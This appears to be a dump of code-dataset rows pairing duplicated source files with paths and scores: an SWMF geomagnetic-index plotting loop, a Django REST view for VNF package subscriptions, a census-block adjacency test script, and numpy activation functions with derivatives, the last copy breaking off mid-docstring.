# and overlay their AU/AL, Kp and Dst curves on one summary figure per event.
for date in dates:
    hour_logs = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/hour/'.format(date))
    orig_logs = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/unsmoothed/'.format(date))
    thirty_logs = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/30min/'.format(date))
    thirty_geo = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/30min'.format(date),logtype='geo')
    hour_geo = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/hour/'.format(date),logtype='geo')
    orig_geo = util.load_logs('/Users/sgraf/Desktop/SWMF_analysis/outputs/{}/unsmoothed/'.format(date),logtype='geo')
    # Base figure: unsmoothed run in red (drawn by results_summary_update).
    fig, axes = results_summary_update(orig_logs,orig_geo,show=False)
    hour_geo.add_ae_quicklook(val='AU', plot_obs=False, target=axes[0], label='Hourly', c='b')
    # NOTE(review): label='Test' looks like leftover debugging; other AL
    # overlays use label=None -- confirm.
    hour_geo.add_ae_quicklook(val='AL', plot_obs=False, target=axes[0],label='Test', c='b')
    hour_geo.add_kp_quicklook(plot_obs=False, target=axes[1], label='Hourly',c='b')
    hour_logs.add_dst_quicklook(plot_obs=False, target=axes[2], label='Hourly',c='b')
    thirty_geo.add_ae_quicklook(val='AU', plot_obs=False, target=axes[0], label='30min',c='g')
    thirty_geo.add_ae_quicklook(val='AL', plot_obs=False, target=axes[0],label=None,c='g')
    thirty_geo.add_kp_quicklook(plot_obs=False, target=axes[1], label='30min',c='g')
    thirty_logs.add_dst_quicklook(plot_obs=False, target=axes[2], label='30min',c='g')
    # Drop the AU/AL and Dst legends; only the Kp panel keeps one.
    axes[0].get_legend().remove()
    axes[2].get_legend().remove()
    axes[0].set_ylabel('AU/AL (nT)')
    fig.suptitle('Summary Plot')
    fig.subplots_adjust(top=0.88)
    #plt.show()
    plt.savefig('{}_au_al_summary_plot_overlay.png'.format(date))
    #fig, axes = results_summary_update(hour_logs,hour_geo,show=False)
    #fig.suptitle('Hourly Smoothed Summary Plot')
    #fig.subplots_adjust(top=0.88)
    #plt.savefig('{}_au_al_summary_plot_hourly.png'.format(date))
    #fig, axes = results_summary_update(thirty_logs,thirty_geo,show=False)
    #fig.suptitle('30min Smoothed Summary Plot')
    #fig.subplots_adjust(top=0.88)
    #plt.savefig('{}_au_al_summary_plot_30min.png'.format(date))

# Disabled scratch blocks below (kept verbatim as inert string literals).
'''
diff_dst = orig_logs['dst_sm'] - hour_logs['dst_sm']
fig, axes = plt.subplots(nrows=3, ncols=1, sharex=True)
orig_logs.add_dst_quicklook(plot_obs=True, target=axes[0])
hour_logs.add_dst_quicklook(plot_obs=True, target=axes[1])
axes[2].plot(orig_logs['time'],diff_dst)
axes[0].set_title('Dst of Unsmoothed Data')
axes[1].set_title('Dst of Hourly Smoothed Data')
axes[2].set_title('Difference between unsmoothed and hourly Dst')
fig.tight_layout()
'''

'''
fig,ax = plt.subplots()
ax.plot(orig_logs.obs_dst['time'], orig_logs.obs_dst['dst'], '--',color='black',label='Observed DST')
ax.plot(orig_logs['time'], orig_logs['dst_sm'],label='Unsmoothed DST')
ax.plot(hour_logs['time'], hour_logs['dst_sm'],label='Hourly DST')
plt.xlim(hour_logs['time'][0], hour_logs['time'][-1])
leg = ax.legend()
''' | 0.431824 | 0.273065 |
import logging
from drf_yasg import openapi
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from catalog.packages.biz.vnf_pkg_subscription import CreateSubscription
from catalog.packages.biz.vnf_pkg_subscription import QuerySubscription
from catalog.packages.biz.vnf_pkg_subscription import TerminateSubscription
from catalog.packages.const import TAG_VNF_PACKAGE_API
from catalog.packages.serializers.response import ProblemDetailsSerializer
from catalog.packages.serializers.vnf_pkg_subscription import PkgmSubscriptionRequestSerializer
from catalog.packages.serializers.vnf_pkg_subscription import PkgmSubscriptionSerializer
from catalog.packages.serializers.vnf_pkg_subscription import PkgmSubscriptionsSerializer
from catalog.packages.serializers.vnf_pkg_notifications import PkgOnboardingNotificationSerializer
from catalog.packages.serializers.vnf_pkg_notifications import PkgChangeNotificationSerializer
from catalog.packages.views.common import validate_data, validate_req_data
from catalog.pub.exceptions import BadRequestException
from catalog.pub.exceptions import VnfPkgSubscriptionException
from .common import view_safe_call_with_log
logger = logging.getLogger(__name__)

# Query-parameter names accepted by the subscription-list GET endpoint;
# anything else triggers a BadRequestException in
# CreateQuerySubscriptionView.get().
VALID_FILTERS = [
    "callbackUri",
    "notificationTypes",
    "vnfdId",
    "vnfPkgId",
    "operationalState",
    "usageState"
]
class CreateQuerySubscriptionView(APIView):
    """
    This resource represents subscriptions.
    The client can use this resource to subscribe to notifications related to NS lifecycle management,
    and to query its subscriptions.
    """

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        request_body=PkgmSubscriptionRequestSerializer,
        responses={
            status.HTTP_201_CREATED: PkgmSubscriptionSerializer(),
            status.HTTP_400_BAD_REQUEST: ProblemDetailsSerializer(),
            status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
        }
    )
    @view_safe_call_with_log(logger=logger)
    def post(self, request):
        """
        The POST method creates a new subscription
        :param request:
        :return:
        """
        logger.debug("Create VNF package Subscription> %s" % request.data)
        # Validate the payload, create the subscription, then validate the
        # stored record before echoing it back to the client.
        req_serializer = validate_req_data(request.data, PkgmSubscriptionRequestSerializer)
        created = CreateSubscription(req_serializer.data).do_biz()
        resp_serializer = validate_data(created, PkgmSubscriptionSerializer)
        return Response(data=resp_serializer.data, status=status.HTTP_201_CREATED)

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        responses={
            status.HTTP_200_OK: PkgmSubscriptionSerializer(),
            status.HTTP_400_BAD_REQUEST: ProblemDetailsSerializer(),
            status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
        }
    )
    @view_safe_call_with_log(logger=logger)
    def get(self, request):
        """
        The GET method queries the list of active subscriptions of the functional block that invokes the method.
        It can be used e.g. for resynchronization after error situations.
        :param request:
        :return:
        """
        logger.debug("SubscribeNotification--get::> %s" % request.query_params)
        # Reject the request if any unknown filter attribute is supplied.
        if any(name not in VALID_FILTERS for name in request.query_params):
            raise BadRequestException("Not a valid filter")
        found = QuerySubscription().query_multi_subscriptions(request.query_params)
        result_serializer = PkgmSubscriptionsSerializer(data=found)
        if not result_serializer.is_valid():
            raise VnfPkgSubscriptionException(result_serializer.errors)
        return Response(data=result_serializer.data, status=status.HTTP_200_OK)
class QueryTerminateSubscriptionView(APIView):
    """
    This resource represents an individual subscription.
    It can be used by the client to read and to terminate a subscription to Notifications related to NS lifecycle management.
    """

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        responses={
            status.HTTP_200_OK: PkgmSubscriptionSerializer(),
            status.HTTP_404_NOT_FOUND: ProblemDetailsSerializer(),
            status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
        }
    )
    @view_safe_call_with_log(logger=logger)
    def get(self, request, subscriptionId):
        """
        The GET method retrieves information about a subscription by reading an individual subscription resource.
        :param request:
        :param subscriptionId:
        :return:
        """
        logger.debug("SubscribeNotification--get::> %s" % subscriptionId)
        resp_data = QuerySubscription().query_single_subscription(subscriptionId)
        # Re-serialize the stored record; a failure here means the persisted
        # subscription no longer matches the response schema.
        subscription_serializer = PkgmSubscriptionSerializer(data=resp_data)
        if not subscription_serializer.is_valid():
            raise VnfPkgSubscriptionException(subscription_serializer.errors)
        return Response(data=subscription_serializer.data, status=status.HTTP_200_OK)

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        responses={
            status.HTTP_204_NO_CONTENT: "",
            status.HTTP_404_NOT_FOUND: ProblemDetailsSerializer(),
            status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
        }
    )
    @view_safe_call_with_log(logger=logger)
    def delete(self, request, subscriptionId):
        """
        The DELETE method terminates an individual subscription.
        :param request:
        :param subscriptionId:
        :return:
        """
        # Fixed copy/pasted log text: this is the DELETE handler, not GET.
        logger.debug("SubscribeNotification--delete::> %s" % subscriptionId)
        TerminateSubscription().terminate(subscriptionId)
        return Response(status=status.HTTP_204_NO_CONTENT)
class PkgOnboardingNotificationView(APIView):
    """
    This resource represents a notification endpoint about package onboarding
    """

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        request_body=PkgOnboardingNotificationSerializer,
        responses={
            status.HTTP_204_NO_CONTENT: ""
        }
    )
    def post(self, request):
        # DRF's APIView.dispatch() invokes handlers as handler(request, ...);
        # without the `request` parameter every routed call raised TypeError.
        pass

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        responses={
            status.HTTP_204_NO_CONTENT: "",
            status.HTTP_500_INTERNAL_SERVER_ERROR: openapi.Response('error message',
                                                                    openapi.Schema(type=openapi.TYPE_STRING))}
    )
    def get(self, request):
        # Same fix as post(): DRF passes the request object to the handler.
        pass
class PkgChangeNotificationView(APIView):
    """
    This resource represents a notification endpoint about package change
    """

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        request_body=PkgChangeNotificationSerializer,
        responses={
            status.HTTP_204_NO_CONTENT: ""
        }
    )
    def post(self):
        # NOTE(review): DRF normally invokes handlers as handler(request, ...);
        # this signature omits `request` -- confirm the endpoint is callable.
        pass

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        responses={
            status.HTTP_204_NO_CONTENT: "",
            status.HTTP_500_INTERNAL_SERVER_ERROR: openapi.Response('error message',
                                                                    openapi.Schema(type=openapi.TYPE_STRING))}
    )
    def get(self):
        # NOTE(review): same missing `request` parameter as post() above.
        pass | catalog/packages/views/vnf_package_subscription_views.py |
import logging
from drf_yasg import openapi
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from catalog.packages.biz.vnf_pkg_subscription import CreateSubscription
from catalog.packages.biz.vnf_pkg_subscription import QuerySubscription
from catalog.packages.biz.vnf_pkg_subscription import TerminateSubscription
from catalog.packages.const import TAG_VNF_PACKAGE_API
from catalog.packages.serializers.response import ProblemDetailsSerializer
from catalog.packages.serializers.vnf_pkg_subscription import PkgmSubscriptionRequestSerializer
from catalog.packages.serializers.vnf_pkg_subscription import PkgmSubscriptionSerializer
from catalog.packages.serializers.vnf_pkg_subscription import PkgmSubscriptionsSerializer
from catalog.packages.serializers.vnf_pkg_notifications import PkgOnboardingNotificationSerializer
from catalog.packages.serializers.vnf_pkg_notifications import PkgChangeNotificationSerializer
from catalog.packages.views.common import validate_data, validate_req_data
from catalog.pub.exceptions import BadRequestException
from catalog.pub.exceptions import VnfPkgSubscriptionException
from .common import view_safe_call_with_log
logger = logging.getLogger(__name__)

# Query-parameter names accepted by the subscription-list GET endpoint;
# anything else triggers a BadRequestException in
# CreateQuerySubscriptionView.get().
VALID_FILTERS = [
    "callbackUri",
    "notificationTypes",
    "vnfdId",
    "vnfPkgId",
    "operationalState",
    "usageState"
]
class CreateQuerySubscriptionView(APIView):
    """
    This resource represents subscriptions.
    The client can use this resource to subscribe to notifications related to NS lifecycle management,
    and to query its subscriptions.
    """

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        request_body=PkgmSubscriptionRequestSerializer,
        responses={
            status.HTTP_201_CREATED: PkgmSubscriptionSerializer(),
            status.HTTP_400_BAD_REQUEST: ProblemDetailsSerializer(),
            status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
        }
    )
    @view_safe_call_with_log(logger=logger)
    def post(self, request):
        """
        The POST method creates a new subscription
        :param request:
        :return:
        """
        logger.debug("Create VNF package Subscription> %s" % request.data)
        # Validate the payload, create the subscription, then validate the
        # stored record before echoing it back to the client.
        req_serializer = validate_req_data(request.data, PkgmSubscriptionRequestSerializer)
        created = CreateSubscription(req_serializer.data).do_biz()
        resp_serializer = validate_data(created, PkgmSubscriptionSerializer)
        return Response(data=resp_serializer.data, status=status.HTTP_201_CREATED)

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        responses={
            status.HTTP_200_OK: PkgmSubscriptionSerializer(),
            status.HTTP_400_BAD_REQUEST: ProblemDetailsSerializer(),
            status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
        }
    )
    @view_safe_call_with_log(logger=logger)
    def get(self, request):
        """
        The GET method queries the list of active subscriptions of the functional block that invokes the method.
        It can be used e.g. for resynchronization after error situations.
        :param request:
        :return:
        """
        logger.debug("SubscribeNotification--get::> %s" % request.query_params)
        # Reject the request if any unknown filter attribute is supplied.
        if any(name not in VALID_FILTERS for name in request.query_params):
            raise BadRequestException("Not a valid filter")
        found = QuerySubscription().query_multi_subscriptions(request.query_params)
        result_serializer = PkgmSubscriptionsSerializer(data=found)
        if not result_serializer.is_valid():
            raise VnfPkgSubscriptionException(result_serializer.errors)
        return Response(data=result_serializer.data, status=status.HTTP_200_OK)
class QueryTerminateSubscriptionView(APIView):
    """
    This resource represents an individual subscription.
    It can be used by the client to read and to terminate a subscription to Notifications related to NS lifecycle management.
    """

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        responses={
            status.HTTP_200_OK: PkgmSubscriptionSerializer(),
            status.HTTP_404_NOT_FOUND: ProblemDetailsSerializer(),
            status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
        }
    )
    @view_safe_call_with_log(logger=logger)
    def get(self, request, subscriptionId):
        """
        The GET method retrieves information about a subscription by reading an individual subscription resource.
        :param request:
        :param subscriptionId:
        :return:
        """
        logger.debug("SubscribeNotification--get::> %s" % subscriptionId)
        resp_data = QuerySubscription().query_single_subscription(subscriptionId)
        # Re-serialize the stored record; a failure here means the persisted
        # subscription no longer matches the response schema.
        subscription_serializer = PkgmSubscriptionSerializer(data=resp_data)
        if not subscription_serializer.is_valid():
            raise VnfPkgSubscriptionException(subscription_serializer.errors)
        return Response(data=subscription_serializer.data, status=status.HTTP_200_OK)

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        responses={
            status.HTTP_204_NO_CONTENT: "",
            status.HTTP_404_NOT_FOUND: ProblemDetailsSerializer(),
            status.HTTP_500_INTERNAL_SERVER_ERROR: ProblemDetailsSerializer()
        }
    )
    @view_safe_call_with_log(logger=logger)
    def delete(self, request, subscriptionId):
        """
        The DELETE method terminates an individual subscription.
        :param request:
        :param subscriptionId:
        :return:
        """
        # Fixed copy/pasted log text: this is the DELETE handler, not GET.
        logger.debug("SubscribeNotification--delete::> %s" % subscriptionId)
        TerminateSubscription().terminate(subscriptionId)
        return Response(status=status.HTTP_204_NO_CONTENT)
class PkgOnboardingNotificationView(APIView):
    """
    This resource represents a notification endpoint about package onboarding
    """

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        request_body=PkgOnboardingNotificationSerializer,
        responses={
            status.HTTP_204_NO_CONTENT: ""
        }
    )
    def post(self, request):
        # DRF's APIView.dispatch() invokes handlers as handler(request, ...);
        # without the `request` parameter every routed call raised TypeError.
        pass

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        responses={
            status.HTTP_204_NO_CONTENT: "",
            status.HTTP_500_INTERNAL_SERVER_ERROR: openapi.Response('error message',
                                                                    openapi.Schema(type=openapi.TYPE_STRING))}
    )
    def get(self, request):
        # Same fix as post(): DRF passes the request object to the handler.
        pass
class PkgChangeNotificationView(APIView):
    """
    This resource represents a notification endpoint about package change
    """

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        request_body=PkgChangeNotificationSerializer,
        responses={
            status.HTTP_204_NO_CONTENT: ""
        }
    )
    def post(self):
        # NOTE(review): DRF normally invokes handlers as handler(request, ...);
        # this signature omits `request` -- confirm the endpoint is callable.
        pass

    @swagger_auto_schema(
        tags=[TAG_VNF_PACKAGE_API],
        responses={
            status.HTTP_204_NO_CONTENT: "",
            status.HTTP_500_INTERNAL_SERVER_ERROR: openapi.Response('error message',
                                                                    openapi.Schema(type=openapi.TYPE_STRING))}
    )
    def get(self):
        # NOTE(review): same missing `request` parameter as post() above.
        pass | 0.69368 | 0.066055 |
from segmentaciones import *
from random import *
# Toy 4x4 fixture: Componente ids are RC (row*10 + col); each gets a random
# dwelling count in [0, 20), so output differs between runs (no seed is set).
c11 = Componente(11, randrange(20))
c12 = Componente(12, randrange(20))
c13 = Componente(13, randrange(20))
c14 = Componente(14, randrange(20))
c21 = Componente(21, randrange(20))
c22 = Componente(22, randrange(20))
c23 = Componente(23, randrange(20))
c24 = Componente(24, randrange(20))
c31 = Componente(31, randrange(20))
c32 = Componente(32, randrange(20))
c33 = Componente(33, randrange(20))
c34 = Componente(34, randrange(20))
c41 = Componente(41, randrange(20))
c42 = Componente(42, randrange(20))
c43 = Componente(43, randrange(20))
c44 = Componente(44, randrange(20))
# "doblar" (turn): one-way ring inside each block of four components.
c11.agregar_adyacencia(c12)
c12.agregar_adyacencia(c13)
c13.agregar_adyacencia(c14)
c14.agregar_adyacencia(c11)
c21.agregar_adyacencia(c22)
c22.agregar_adyacencia(c23)
c23.agregar_adyacencia(c24)
c24.agregar_adyacencia(c21)
c31.agregar_adyacencia(c32)
c32.agregar_adyacencia(c33)
c33.agregar_adyacencia(c34)
c34.agregar_adyacencia(c31)
c41.agregar_adyacencia(c42)
c42.agregar_adyacencia(c43)
c43.agregar_adyacencia(c44)
c44.agregar_adyacencia(c41)
# "volver" (go back): bidirectional links between neighbouring blocks.
c12.agregar_adyacencia(c24)
c24.agregar_adyacencia(c12)
c13.agregar_adyacencia(c31)
c31.agregar_adyacencia(c13)
c23.agregar_adyacencia(c41)
c41.agregar_adyacencia(c23)
c32.agregar_adyacencia(c44)
c44.agregar_adyacencia(c32)
# "cruzar" (cross): one-way crossings between blocks.
c11.agregar_adyacencia(c21)
c23.agregar_adyacencia(c13)
c31.agregar_adyacencia(c41)
c43.agregar_adyacencia(c33)
c34.agregar_adyacencia(c14)
c12.agregar_adyacencia(c32)
c44.agregar_adyacencia(c24)
c22.agregar_adyacencia(c42)
# Master collection; the ordering below is intentional and preserved.
componentes = Componentes([
    c11, c21,
    c14, c12, c24, c22,
    c13, c23,
    c31, c41,
    c34, c32, c44, c42,
    c33, c43,
])
set_segmentacion_deseada(40)
print ('---------------componentes-con-adyacencias---')
# Dump every component with its dwelling count and adjacency ids.
for c in componentes:
    adys = Componentes()
    for a in c.adyacentes:
        adys.append(a.id)
    print (c.id, '(', c.vivs,')', adys)
print ('---------------test-conectados---------------')
print ('---------------segmentos---------------------')
# One segment per block ("mza" = manzana, i.e. city block).
segmento_mza1_1 = Segmento([c11, c12, c13, c14])
segmento_mza1_2 = Segmento([c21, c22, c23, c24])
segmento_mza1_3 = Segmento([c31, c32, c33, c34])
segmento_mza1_4 = Segmento([c41, c42, c43, c44])
print ('mza1 ', segmento_mza1_1)
print ('mza2 ', segmento_mza1_2)
print ('mza3 ', segmento_mza1_3)
print ('mza4 ', segmento_mza1_4) | sandbox/test_vecinos.py | from segmentaciones import *
from random import *
# Toy 4x4 fixture: Componente ids are RC (row*10 + col); each gets a random
# dwelling count in [0, 20), so output differs between runs (no seed is set).
c11 = Componente(11, randrange(20))
c12 = Componente(12, randrange(20))
c13 = Componente(13, randrange(20))
c14 = Componente(14, randrange(20))
c21 = Componente(21, randrange(20))
c22 = Componente(22, randrange(20))
c23 = Componente(23, randrange(20))
c24 = Componente(24, randrange(20))
c31 = Componente(31, randrange(20))
c32 = Componente(32, randrange(20))
c33 = Componente(33, randrange(20))
c34 = Componente(34, randrange(20))
c41 = Componente(41, randrange(20))
c42 = Componente(42, randrange(20))
c43 = Componente(43, randrange(20))
c44 = Componente(44, randrange(20))
# "doblar" (turn): one-way ring inside each block of four components.
c11.agregar_adyacencia(c12)
c12.agregar_adyacencia(c13)
c13.agregar_adyacencia(c14)
c14.agregar_adyacencia(c11)
c21.agregar_adyacencia(c22)
c22.agregar_adyacencia(c23)
c23.agregar_adyacencia(c24)
c24.agregar_adyacencia(c21)
c31.agregar_adyacencia(c32)
c32.agregar_adyacencia(c33)
c33.agregar_adyacencia(c34)
c34.agregar_adyacencia(c31)
c41.agregar_adyacencia(c42)
c42.agregar_adyacencia(c43)
c43.agregar_adyacencia(c44)
c44.agregar_adyacencia(c41)
# "volver" (go back): bidirectional links between neighbouring blocks.
c12.agregar_adyacencia(c24)
c24.agregar_adyacencia(c12)
c13.agregar_adyacencia(c31)
c31.agregar_adyacencia(c13)
c23.agregar_adyacencia(c41)
c41.agregar_adyacencia(c23)
c32.agregar_adyacencia(c44)
c44.agregar_adyacencia(c32)
# "cruzar" (cross): one-way crossings between blocks.
c11.agregar_adyacencia(c21)
c23.agregar_adyacencia(c13)
c31.agregar_adyacencia(c41)
c43.agregar_adyacencia(c33)
c34.agregar_adyacencia(c14)
c12.agregar_adyacencia(c32)
c44.agregar_adyacencia(c24)
c22.agregar_adyacencia(c42)
# Master collection; the ordering below is intentional and preserved.
componentes = Componentes([
    c11, c21,
    c14, c12, c24, c22,
    c13, c23,
    c31, c41,
    c34, c32, c44, c42,
    c33, c43,
])
set_segmentacion_deseada(40)
print ('---------------componentes-con-adyacencias---')
# Dump every component with its dwelling count and adjacency ids.
for c in componentes:
    adys = Componentes()
    for a in c.adyacentes:
        adys.append(a.id)
    print (c.id, '(', c.vivs,')', adys)
print ('---------------test-conectados---------------')
print ('---------------segmentos---------------------')
# One segment per block ("mza" = manzana, i.e. city block).
segmento_mza1_1 = Segmento([c11, c12, c13, c14])
segmento_mza1_2 = Segmento([c21, c22, c23, c24])
segmento_mza1_3 = Segmento([c31, c32, c33, c34])
segmento_mza1_4 = Segmento([c41, c42, c43, c44])
print ('mza1 ', segmento_mza1_1)
print ('mza2 ', segmento_mza1_2)
print ('mza3 ', segmento_mza1_3)
print ('mza4 ', segmento_mza1_4) | 0.190385 | 0.092442 |
import numpy as np
def identity(z):
    """Identity activation: passes its input through unchanged.

    Args:
        z (np.array)

    Returns:
        f(z) = z (np.array)
    """
    return z
def dfdz_identity(z):
    """Derivative of the identity activation: one everywhere.

    Args:
        z (np.array)

    Returns:
        df(z)/dz = 1.0 (np.array with the shape and dtype of z)
    """
    return np.ones_like(z)
def sigmoid(z):
    """Logistic sigmoid: squashes z into the open interval (0, 1).

    Args:
        z (np.array)

    Returns:
        f(z) = 1 / (1 + exp(-z)) (np.array)
    """
    exp_neg = np.exp(-z)
    return 1.0 / (1.0 + exp_neg)
def dfdz_sigmoid(z):
    """Derivative of the Sigmoid function...

    Args:
        z (np.array)

    Returns:
        df(z)/dz = f(z) * (1 - f(z)) (np.array)
    """
    # Evaluate the sigmoid once instead of twice.
    s = sigmoid(z)
    return s * (1.0 - s)
def logistic(z):
    """Logistic function -- an alias for sigmoid().

    Args:
        z (np.array)

    Returns:
        f(z) = 1 / (1 + exp(-z)) (np.array)
    """
    # Delegates entirely to sigmoid(); kept as a separate name for callers
    # that refer to the activation as "logistic".
    return sigmoid(z)
def dfdz_logistic(z):
    """Derivative of the Logistic function...

    Args:
        z (np.array)

    Returns:
        df(z)/dz = f(z) * (1 - f(z)) (np.array)
    """
    # Evaluate the sigmoid once instead of twice.
    s = sigmoid(z)
    return s * (1.0 - s)
def tanh(z):
    """Hyperbolic tangent function...

    Args:
        z (np.array)

    Returns:
        f(z) = tanh(z) (np.array)
    """
    # np.tanh is numerically stable for large |z|; the explicit
    # 2 / (1 + exp(-2z)) - 1 form overflows np.exp for very negative z.
    return np.tanh(z)
def dfdz_tanh(z):
    """Derivative of the hyperbolic tangent function...

    Args:
        z (np.array)

    Returns:
        df(z)/dz = 1.0 - tanh(z)**2 (np.array)
    """
    # Single, overflow-safe evaluation of tanh instead of recomputing it
    # via the exp-based helper.
    t = np.tanh(z)
    return 1.0 - np.square(t)
def softsign(z):
    """Softsign activation: z rescaled into the open interval (-1, 1).

    Args:
        z (np.array)

    Returns:
        f(z) = z / (1.0 + np.abs(z)) (np.array)
    """
    denom = 1.0 + np.abs(z)
    return z / denom
def dfdz_softsign(z):
    """Derivative of the softsign function.

    Implemented (previously raised RuntimeError('not implemented...')).

    Args:
        z (np.array)

    Returns:
        df(z)/dz = 1 / (1 + |z|)**2 (np.array)
    """
    # d/dz [z / (1 + |z|)] = 1 / (1 + |z|)**2 for z != 0; the one-sided
    # derivatives agree at z == 0, so the formula holds everywhere.
    return 1.0 / np.square(1.0 + np.abs(z))
def ReLU(z):
    """Rectified linear unit: elementwise max(z, 0).

    Args:
        z (np.array)

    Returns:
        f(z) = np.max(0, z) (np.array)
    """
    return np.maximum(z, 0)
def dfdz_ReLU(z):
    """Derivative of the rectified linear unit function...

    Args:
        z (np.array)

    Returns:
        df(z)/dz = 1 if x > 0 else 0 (np.array)
    """
    # Return floats rather than the raw boolean mask for consistency with
    # the other dfdz_* helpers; the subgradient at z == 0 is taken as 0.
    return np.where(z > 0, 1.0, 0.0)
def LReLU(z):
    """Leaky ReLU: identity for positive z, slope 0.01 otherwise.

    Args:
        z (np.array)

    Returns:
        f(z) = z if z > 0 else 0.01 * z (np.array)
    """
    # Leaky ReLU is simply PReLU with the slope fixed at 0.01.
    return PReLU(z, 0.01)
def dfdz_LReLU(z):
    """Derivative of the leaky ReLU.

    Args:
        z (np.array)

    Returns:
        df(z)/dz = 1 if x > 0 else 0.01 (np.array)
    """
    # Delegates to the parametric derivative with the slope fixed at 0.01.
    return dfdz_PReLU(z, 0.01)
def PReLU(z, alpha):
    """Parametric ReLU: identity for positive z, slope `alpha` otherwise.

    Args:
        z (np.array)
        alpha: slope applied where z <= 0.

    Returns:
        f(z) = z if z > 0 else alpha * z (np.array)
    """
    return np.where(z > 0, z, alpha * z)
def dfdz_PReLU(z, alpha):
    """Derivative of the parametric rectified linear unit function...

    Args:
        z (np.array)
        alpha: slope used for the non-positive region.

    Returns:
        df(z)/dz = 1 if x > 0 else alpha (np.array)
    """
    # The two boolean masks are complementary, so exactly one branch
    # contributes per element (z == 0 gets alpha).
    return 1.0 * (z > 0) + alpha * (z <= 0) | MachineLearningLibrary/NeuralNetworks/NeuralNetworkUtilities.py | import numpy as np
def identity(z):
    """Identity activation: passes its input through unchanged.

    Args:
        z (np.array)

    Returns:
        f(z) = z (np.array)
    """
    return z
def dfdz_identity(z):
    """Derivative of the identity activation: one everywhere.

    Args:
        z (np.array)

    Returns:
        df(z)/dz = 1.0 (np.array with the shape and dtype of z)
    """
    return np.ones_like(z)
def sigmoid(z):
    """Logistic sigmoid: squashes z into the open interval (0, 1).

    Args:
        z (np.array)

    Returns:
        f(z) = 1 / (1 + exp(-z)) (np.array)
    """
    exp_neg = np.exp(-z)
    return 1.0 / (1.0 + exp_neg)
def dfdz_sigmoid(z):
    """Derivative of the Sigmoid function...

    Args:
        z (np.array)

    Returns:
        df(z)/dz = f(z) * (1 - f(z)) (np.array)
    """
    # Evaluate the sigmoid once instead of twice.
    s = sigmoid(z)
    return s * (1.0 - s)
def logistic(z):
    """Logistic function -- an alias for sigmoid().

    Args:
        z (np.array)

    Returns:
        f(z) = 1 / (1 + exp(-z)) (np.array)
    """
    # Delegates entirely to sigmoid(); kept as a separate name for callers
    # that refer to the activation as "logistic".
    return sigmoid(z)
def dfdz_logistic(z):
    """Derivative of the Logistic function...

    Args:
        z (np.array)

    Returns:
        df(z)/dz = f(z) * (1 - f(z)) (np.array)
    """
    # Evaluate the sigmoid once instead of twice.
    s = sigmoid(z)
    return s * (1.0 - s)
def tanh(z):
    """Hyperbolic tangent function...

    Args:
        z (np.array)

    Returns:
        f(z) = tanh(z) (np.array)
    """
    # np.tanh is numerically stable for large |z|; the explicit
    # 2 / (1 + exp(-2z)) - 1 form overflows np.exp for very negative z.
    return np.tanh(z)
def dfdz_tanh(z):
    """Derivative of the hyperbolic tangent function...

    Args:
        z (np.array)

    Returns:
        df(z)/dz = 1.0 - tanh(z)**2 (np.array)
    """
    # Single, overflow-safe evaluation of tanh instead of recomputing it
    # via the exp-based helper.
    t = np.tanh(z)
    return 1.0 - np.square(t)
def softsign(z):
    """Softsign activation: z rescaled into the open interval (-1, 1).

    Args:
        z (np.array)

    Returns:
        f(z) = z / (1.0 + np.abs(z)) (np.array)
    """
    denom = 1.0 + np.abs(z)
    return z / denom
def dfdz_softsign(z):
    """Derivative of the softsign function.

    Implemented (previously raised RuntimeError('not implemented...')).

    Args:
        z (np.array)

    Returns:
        df(z)/dz = 1 / (1 + |z|)**2 (np.array)
    """
    # d/dz [z / (1 + |z|)] = 1 / (1 + |z|)**2 for z != 0; the one-sided
    # derivatives agree at z == 0, so the formula holds everywhere.
    return 1.0 / np.square(1.0 + np.abs(z))
def ReLU(z):
    """Rectified linear unit: elementwise max(z, 0).

    Args:
        z (np.array)

    Returns:
        f(z) = np.max(0, z) (np.array)
    """
    return np.maximum(z, 0)
def dfdz_ReLU(z):
    """Derivative of the rectified linear unit function...

    Args:
        z (np.array)

    Returns:
        df(z)/dz = 1 if x > 0 else 0 (np.array)
    """
    # Return floats rather than the raw boolean mask for consistency with
    # the other dfdz_* helpers; the subgradient at z == 0 is taken as 0.
    return np.where(z > 0, 1.0, 0.0)
def LReLU(z):
    """Leaky ReLU: identity for positive z, slope 0.01 otherwise.

    Args:
        z (np.array)

    Returns:
        f(z) = z if z > 0 else 0.01 * z (np.array)
    """
    # Leaky ReLU is simply PReLU with the slope fixed at 0.01.
    return PReLU(z, 0.01)
def dfdz_LReLU(z):
    """Derivative of the leaky ReLU.

    Args:
        z (np.array)

    Returns:
